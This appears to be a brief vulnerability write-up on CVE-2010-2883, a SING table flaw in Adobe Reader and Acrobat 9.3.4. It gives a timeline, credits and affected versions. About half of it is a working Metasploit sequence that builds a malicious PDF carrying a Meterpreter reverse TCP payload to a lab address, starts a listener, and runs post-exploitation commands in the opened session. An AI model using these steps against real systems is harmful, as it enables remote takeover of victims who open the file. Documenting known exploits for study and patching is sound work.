Timeline :

Vulnerability exploited in the wild and discovered by Mila Parkour the 2010-09-06
Metasploit PoC provided the 2010-09-08

PoC provided by :

sn0wfl0w
vicheck
jduck

Reference(s) :

CVE-2010-2883
APSA10-02

Affected version(s) :

Adobe Reader 9.3.4 and previous versions for Windows, Macintosh and UNIX.
Adobe Acrobat 9.3.4 and previous versions for Windows and Macintosh.

Tested on Windows XP SP3 with :

Adobe Reader 9.3.4

Description :

This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version are assumed to be vulnerable as well.

Commands :

use exploit/windows/fileformat/adobe_cooltype_sing
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig